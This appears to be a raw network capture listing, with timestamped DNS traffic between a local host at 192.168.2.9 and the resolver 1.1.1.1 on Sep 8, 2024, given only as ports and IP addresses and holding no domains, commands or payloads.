                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293747902 CEST6033153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293935061 CEST5305753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294075012 CEST6140853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294105053 CEST5512953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294287920 CEST6141853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294325113 CEST6074853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294444084 CEST6320853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295022964 CEST6168453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295804977 CEST6541153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296461105 CEST6230853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296890974 CEST6090953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.297286987 CEST53526451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.297600031 CEST6327653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.297821045 CEST53588891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.298145056 CEST53567411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.298217058 CEST4996653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.298391104 CEST53540801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.299412966 CEST53604251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.299470901 CEST53497781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.299480915 CEST53643031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.299592018 CEST53542111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.301234007 CEST53618651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.301362991 CEST53588381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.301536083 CEST53535701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.302613020 CEST53603311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303631067 CEST53607481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303864956 CEST5422153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303951979 CEST6071353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.304131031 CEST53632081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.304260015 CEST53614181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.304594994 CEST53614081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.305161953 CEST53654111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.305174112 CEST53616841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.305249929 CEST53628591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.306483984 CEST53609091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307189941 CEST53632761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307383060 CEST5555053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307780981 CEST6325553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.310146093 CEST53551291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.312825918 CEST53530571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.312838078 CEST53623081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.313281059 CEST53542211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.313622952 CEST53607131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.314414978 CEST53499661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.317364931 CEST53632551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.324664116 CEST53555501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.325037956 CEST53628281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032231092 CEST6323953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032645941 CEST5337853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032763004 CEST5216253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033050060 CEST6217453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033137083 CEST5767153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033369064 CEST5213853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033667088 CEST5307053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.041277885 CEST5993853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.041318893 CEST6346853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.042120934 CEST5183753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.042704105 CEST53632391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043195963 CEST5289853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043603897 CEST53521381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043628931 CEST53576711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043926001 CEST53621741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043935061 CEST53521621.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043945074 CEST53530701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.049184084 CEST53533781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.051285028 CEST53599381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.052145004 CEST53634681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.052440882 CEST53518371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.053251982 CEST53528981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.054763079 CEST6035353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.054881096 CEST5276953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.055098057 CEST5138753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057285070 CEST5017653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057473898 CEST5105453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057501078 CEST5063553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057733059 CEST6032353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057754040 CEST5543253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057972908 CEST5609253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057972908 CEST6376753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058159113 CEST6477653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058159113 CEST6248153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058352947 CEST6431553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060064077 CEST6489553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060259104 CEST6280253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060507059 CEST4992653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.063828945 CEST53603531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.063991070 CEST5319253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064019918 CEST5796453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064240932 CEST5598753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064260960 CEST5421253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064431906 CEST6099653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064440966 CEST53527691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064538002 CEST5830753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064646959 CEST5334253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064841986 CEST5824053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.065099001 CEST6250353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.066343069 CEST53510541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.067331076 CEST53501761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.067409039 CEST53647761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.067990065 CEST53603231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.068001032 CEST53624811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.068564892 CEST53560921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.069902897 CEST53499261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.070744991 CEST53513871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.073635101 CEST53609961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.074160099 CEST53542121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.074259996 CEST53559871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.074651003 CEST53533421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.074697971 CEST53583071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.074939966 CEST53637671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.076723099 CEST53628021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.076826096 CEST53648951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.077012062 CEST53643151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.079817057 CEST53531921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.080090046 CEST53579641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.080677032 CEST53625031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.088207006 CEST53506351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.094809055 CEST53582401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.224406958 CEST53554321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.357971907 CEST4917553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.363343954 CEST6350953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.364331007 CEST5871953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.368407965 CEST53491751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.369193077 CEST6524453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.369715929 CEST4972653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.373152971 CEST53635091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.375792980 CEST6339153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.379498959 CEST53652441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.380445004 CEST5823253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.384825945 CEST53497261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.390275002 CEST53582321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.392167091 CEST53633911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.396317959 CEST53587191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.407135010 CEST6085553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.413397074 CEST5256753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.419975996 CEST4976553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.424189091 CEST53525671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.426214933 CEST6228853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.426516056 CEST6125753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.435975075 CEST53497651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.436731100 CEST53622881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.437872887 CEST5767653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.438117027 CEST53608551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.453798056 CEST53576761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.456649065 CEST5515953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.459173918 CEST53612571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.465892076 CEST53551591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.489433050 CEST5363053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.490026951 CEST5467153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.490775108 CEST6422253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492104053 CEST5066953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492156982 CEST4973953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492779970 CEST5550453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052159071 CEST5901053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052354097 CEST53571351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052371025 CEST6203253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052468061 CEST53615361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052580118 CEST6275853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052751064 CEST5865153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053719997 CEST5621553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053762913 CEST53576471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.054284096 CEST5749253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.056998014 CEST53529781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.061641932 CEST53620321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.062048912 CEST53590101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.063867092 CEST53562151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.065130949 CEST53574921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068511009 CEST53627581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068876982 CEST6260353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068995953 CEST53586511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069070101 CEST6449853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069262028 CEST5471053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069400072 CEST5479653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069562912 CEST5191453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069727898 CEST5818053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070072889 CEST6344153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070291996 CEST6100053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070429087 CEST5565153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070619106 CEST5347853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071643114 CEST5086153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071804047 CEST6356953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072004080 CEST6056053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072221041 CEST5723653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072242975 CEST6120853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.073992968 CEST5264953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.075388908 CEST53540221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.078457117 CEST53547961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079030037 CEST53610001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079078913 CEST5679053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079132080 CEST53547101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079243898 CEST5398253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079391003 CEST53644981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079402924 CEST5219153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079755068 CEST53581801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080049038 CEST5803053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080204964 CEST53534781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080230951 CEST5354153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080405951 CEST6201453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080549955 CEST6531153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080570936 CEST53526491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080580950 CEST53635691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080969095 CEST53508611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.081769943 CEST53612081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.081927061 CEST53572361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.083241940 CEST53605601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.085827112 CEST53634411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089137077 CEST53521911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089330912 CEST53539821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089766979 CEST53580301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.090154886 CEST53620141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.093966961 CEST53535411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.098793983 CEST53626031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.109055996 CEST53567901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135046959 CEST6019553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135236025 CEST5393153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135412931 CEST6418153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.136312962 CEST4941453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.145813942 CEST53601951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.146142006 CEST53641811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.146645069 CEST53494141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.151515007 CEST53539311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.204488039 CEST53585951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.226582050 CEST53519141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.228847027 CEST53556511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.245719910 CEST53653111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.965338945 CEST5448753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966331959 CEST6145253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966898918 CEST5947253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969425917 CEST4948153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969644070 CEST6057053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.970660925 CEST5557153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.971765995 CEST6461553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972218037 CEST5145353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972635031 CEST6417053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972774029 CEST5903553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973210096 CEST5048353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973578930 CEST5839053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973633051 CEST6155053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974359989 CEST5966353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974360943 CEST6547353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974842072 CEST4964153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.975255013 CEST5054253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976052046 CEST5889453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976309061 CEST5499853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976914883 CEST6374453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977085114 CEST5311053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977339029 CEST5129653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977801085 CEST5611453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977987051 CEST5649353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978353977 CEST5782553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978521109 CEST6451653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978801012 CEST6106753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979181051 CEST5574553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979803085 CEST6114053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.981178999 CEST6042753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.982916117 CEST5238853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.983922005 CEST5427553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.984848022 CEST6137853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.985395908 CEST5398453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.741568089 CEST5755253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.743910074 CEST5114853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.744091034 CEST6419553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.747504950 CEST53607601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748126984 CEST6266753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748579025 CEST53523221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748730898 CEST5478853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748950958 CEST6114953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749342918 CEST53500581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749371052 CEST53647501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749381065 CEST53577131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750422001 CEST53497591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750746965 CEST6192353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750929117 CEST5534253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751094103 CEST4955753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751200914 CEST53575521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751616001 CEST5024053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752652884 CEST5715353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752916098 CEST5084353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753098965 CEST6450153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753537893 CEST53641951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753873110 CEST53511481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.755970955 CEST53545641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.758691072 CEST53611491.1.1.1192.168.2.9
